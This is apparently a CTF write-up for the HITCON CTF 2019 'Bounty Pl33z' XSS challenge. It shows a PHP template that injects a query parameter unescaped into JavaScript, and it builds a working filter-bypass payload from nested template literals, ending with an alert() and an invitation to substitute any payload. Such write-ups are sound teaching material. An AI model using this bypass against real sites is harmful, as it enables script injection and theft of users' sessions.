# Bounty Pl33z It seems that I will lose the title of ["A bag of brown lion in Hong Kong"](https://duckduckgo.com/?q=this+is+you+liking+your+own+post&t=h_&iax=images&ia=images) if I cannot solve this question as the question is made by a grandmaster in Hong Kong. It is an XSS challenge. fd.php?q=*payload* ``` <script type="text/javascript"> if (window.top == window.self) { window.self.location.href = "https://<?=$q;?>.orange.ctf/oauth/authorize?client_id=1&scope=read&redirect_uri=https://twitter.com/orange_8361"; } else { var data = JSON.stringify({ message: 'CTF.API.remote', data: { location: "https://<?=$q;?>.orange.ctf/oauth/authorize?client_id=1&scope=read&redirect_uri=https://twitter.com/orange_8361" } }); window.parent.postMessage( data, "https://<?=$q;?>.orange.ctf" ); } </script> ``` But the payload will be filtered if there is more than one quotes, or include `/`,`\`,`.`,`<` and newline characters. If only one double quote can be injected, it will break the javascript and cannot be executed. One idea is to use comment just like what you did in SQL injection, but `/` is blocked. (In fact the official answer uses a strange way of commenting) Another way is to use multiline strings, just like what you did in those shot programming language that does not support multiline comments. (Yes, you, freaking Camel) In javascript we can use [template literals](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals) to define multiline strings without escaping. The ideal case is to comment out everything after the first payload, but the last payload is not located at the very end of the script, so it will have some residual `.orange.ctf");}` So the objective is to make something like this ``` if (window.top == window.self) { window.self.location.href = "https://"-xss()-(` some trash `-".orange.ctf");} ``` Another feature of template literals is nesting template: ``` console.log(`1+2=${1+2}`) //gives 1+2=3 ``` and you may want to make another template literal as well... ``` console.log(`1+2=${`1+2`}`) //gives 1+2=1+2 ``` After some test got this pattern that works: ``` `}`-"-alert()-(`${`${`${` ``` which will look like this ``` `${`${`${` trash1 }`+ "+(`${`${`${` trash2 " } trash3 `}`+"+(`${`${`${`.orange.ctf" ``` (lucky there is a `}` after the second payload) Replace `alert()` with your favorite payload to XSS the bot. ###### tags: `HITCON CTF 2019 Quals`